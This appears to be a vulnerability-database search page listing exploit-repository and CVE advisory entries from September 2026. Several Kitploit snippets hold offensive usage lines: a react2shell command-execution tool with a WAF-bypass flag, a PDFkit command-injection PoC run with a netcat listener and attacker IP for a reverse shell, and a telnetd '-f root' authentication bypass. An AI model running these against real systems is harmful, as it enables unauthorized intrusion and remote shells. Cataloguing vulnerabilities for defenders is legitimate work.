Lucene search
+L

34819 matches found

Kitploit
Kitploit
added 2026/09/10 11:07 a.m.5 views

CVE-2025-55182-PoC

React2Shell CVE-2025-55182 PoC(概念验证) 用法 root@kitploit: 交互式 Shell ./react2shell -u http://target:3000 单条命令 ./react2shell -u http://target:3000 -c "id" WAF 绕过(128KB 垃圾数据) ./react2shell -u http://target:3000 -waf 128 构建 root@kitploit: go build -o react2shell . 选项 标志| 描述 ---|--- -u| 目标 URL -c| 单条命令(可...

10CVSS7.5AI score0.99802EPSS
SaveExploits391
IBM Security Bulletins
IBM Security Bulletins
added 2026/09/10 9:51 a.m.6 views

Security Bulletin: SQL injection vulnerability in IBM Cloud Pak for Business Automation Operational Decision Manager component - CVE-2026-18658

Summary IBM Operational Decision Manager in IBM Cloud Pak for Business Automation is vulnerable to a SQL injection attack. Vulnerability Details CVEID:CVE-2026-18658 DESCRIPTION: IBM Operational Decision Manager 9.6.0.0, 9.5.0.0, 8.11.1.0, 8.11.0.1, 8.12.0.1, 9.5.0.1, and 9.0.0.1 is vulnerable to...

9.8CVSS0.00432EPSS
SaveExploits0Affected Software2
Kitploit
Kitploit
added 2026/09/10 9:38 a.m.10 views

CVE-2007-2447

CVE-2007-2447 Samba 漏洞利用程序 一个针对 Samba smbd 3.0.20-Debian 的 CVE-2007-2447 漏洞的独立 Rust 实现。 漏洞描述 CVE-2007-2447 是 Samba 3.0.0 至 3.0.25rc3 版本中的一个命令注入漏洞。该漏洞存在于 SamrChangePassword 函数中,该函数未能正确清理用户输入,攻击者可以通过在 SMB 认证期间在用户名字段中使用 shell 元字符来执行任意命令。 前提条件 系统已安装 Rust 目标运行存在漏洞的 Samba 版本 目标必须安装有 netcat(通常默认安装) 使用方法...

6CVSS8.1AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/10 9:24 a.m.9 views

CVE-2026-24061-lab

CVE-2026-24061 — Laboratorio de Reproducción ⚠️ Con fines educativos únicamente. Entorno de laboratorio aislado. Francés abajo Resumen Bypass de autenticación crítico CVSS 9.8 en GNU InetUtils telnetd ≤ 2.7. Al inyectar -f root como variable USER mediante la opción Telnet NEWENVIRON, un atacante n...

9.8CVSS8.2AI score0.97993EPSS
SaveExploits68
NVD
NVD
added 2026/09/10 9:17 a.m.4 views

CVE-2026-88282

GeoVision GV-LPC2211 V1.13 allows an administrator-controlled FTP username containing shell metacharacters to be executed as arbitrary root commands during a subsequent FTP-account update...

7.2CVSS0.003EPSS
SaveExploits0References1
NVD
NVD
added 2026/09/10 9:17 a.m.4 views

CVE-2026-88273

GeoVision GV-LPC2211 V1.13 allows an administrator-controlled PPPoE username to escape a sourced shell configuration assignment and execute arbitrary commands as root...

7.2CVSS0.00371EPSS
SaveExploits0References1
NVD
NVD
added 2026/09/10 9:17 a.m.5 views

CVE-2026-88275

GeoVision GV-LPC2211 V1.13 allows an administrator-controlled WPA-PSK containing shell syntax to execute arbitrary commands as root when wireless configuration is applied...

7.2CVSS0.00371EPSS
SaveExploits0References1
NVD
NVD
added 2026/09/10 9:17 a.m.4 views

CVE-2026-88276

GeoVision GV-LPC2211 V1.13 allows administrator-controlled WEP key values containing shell syntax to execute arbitrary commands as root...

7.2CVSS0.00371EPSS
SaveExploits0References1
NVD
NVD
added 2026/09/10 9:17 a.m.6 views

CVE-2026-88272

GeoVision GV-LPC2211 V1.13 allows an administrator-controlled username containing shell metacharacters to be executed as arbitrary root commands when the stored username is later deleted...

7.2CVSS0.003EPSS
SaveExploits0References1
NVD
NVD
added 2026/09/10 9:17 a.m.5 views

CVE-2026-88274

GeoVision GV-LPC2211 V1.13 allows an administrator-controlled wireless SSID containing shell syntax to execute arbitrary commands as root...

7.2CVSS0.00371EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/10 9:00 a.m.5 views

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell 简介 我在 LetsDefend 实验室中研究了一个名为 ToolShell CVE-2025-53770 的 SharePoint 零日漏洞。我模拟了一场真实的零日攻击,其中恶意 POST 请求绕过身份验证,运行 PowerShell 窃取 MachineKeySection 密钥,编译 payload.exe,并植入了一个 Web 后门 spinstall0.aspx。我记录了所有操作,分析了行为,并隔离了主机。本 README...

9.8CVSS7.9AI score0.99998EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/10 8:44 a.m.6 views

CVE-2025-3248

CVE-2025-3248 简介 Langflow 1.3.0 之前的版本在 /api/v1/validate/code 端点中通过 Python exec 函数存在未经验证的代码注入漏洞。 此漏洞利用程序通过该漏洞建立反向 shell 连接。 使用方法 配置 root@kitploit: git clone https://github.com/wand3rlust/CVE-2025-3248.git cd CVE-2025-3248/ python3 -m venv venv . venv/bin/activate pip install -r requirements.txt 漏洞...

9.8CVSS8.5AI score0.99989EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/10 8:40 a.m.6 views

CVE-2022-25765

CVE-2022-25765 漏洞利用 针对 CVE-2022-25765(PDFkit 命令注入)的小型 PoC 漏洞利用 使用方法 1. 在攻击机器上启动 netcat 监听器: root@kitploit: nc -lvnp 4444 2. 运行漏洞利用程序: root@kitploit: python cve-2022-25765.py -t http://目标IP:端口 -l 你的IP -p 你的端口 示例: root@kitploit: python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 44...

9.8CVSS8.2AI score0.42961EPSS
SaveExploits12References2
Cvelist
Cvelist
added 2026/09/10 8:23 a.m.35 views

CVE-2026-88282 GV-LPCLPC2011/2211 - Stored FTP-Username Command Injection

GeoVision GV-LPC2211 V1.13 allows an administrator-controlled FTP username containing shell metacharacters to be executed as arbitrary root commands during a subsequent FTP-account update...

7.2CVSS0.003EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/09/10 8:23 a.m.6 views

EUVD-2026-75316

GeoVision GV-LPC2211 V1.13 allows an administrator-controlled FTP username containing shell metacharacters to be executed as arbitrary root commands during a subsequent FTP-account update...

7.2CVSS0.003EPSS
SaveExploits0References1
CVE
CVE
added 2026/09/10 8:23 a.m.9 views

CVE-2026-88282

GeoVision GV-LPC2211 (LPC series) V1.13 contains a stored command injection vulnerability in its FTP username field. An administrator who sets an FTP username containing shell metacharacters can trigger arbitrary root command execution during a subsequent FTP-account update operation. The vulnera...

7.2CVSS0.003EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/09/10 8:21 a.m.6 views

EUVD-2026-75311

GeoVision GV-LPC2211 V1.13 allows an authenticated ONVIF user to inject shell commands through ConsumerReference.Address and execute arbitrary commands as root...

8.8CVSS0.00343EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/09/10 8:21 a.m.7 views

EUVD-2026-75310

GeoVision GV-LPC2211 V1.13 allows administrator-controlled WEP key values containing shell syntax to execute arbitrary commands as root...

7.2CVSS0.00371EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/09/10 8:20 a.m.7 views

EUVD-2026-75309

GeoVision GV-LPC2211 V1.13 allows an administrator-controlled WPA-PSK containing shell syntax to execute arbitrary commands as root when wireless configuration is applied...

7.2CVSS0.00371EPSS
SaveExploits0References1
CVE
CVE
added 2026/09/10 8:20 a.m.13 views

CVE-2026-88275

GeoVision GV-LPC2211 (also affecting GV-LPC2011) version V1.13 contains a command injection vulnerability in its wireless configuration. An administrator can craft a WPA-PSK password containing shell syntax that, when the wireless configuration is applied, executes arbitrary commands as root . Th...

7.2CVSS0.00371EPSS
SaveExploits0References1
Rows per page
Query Builder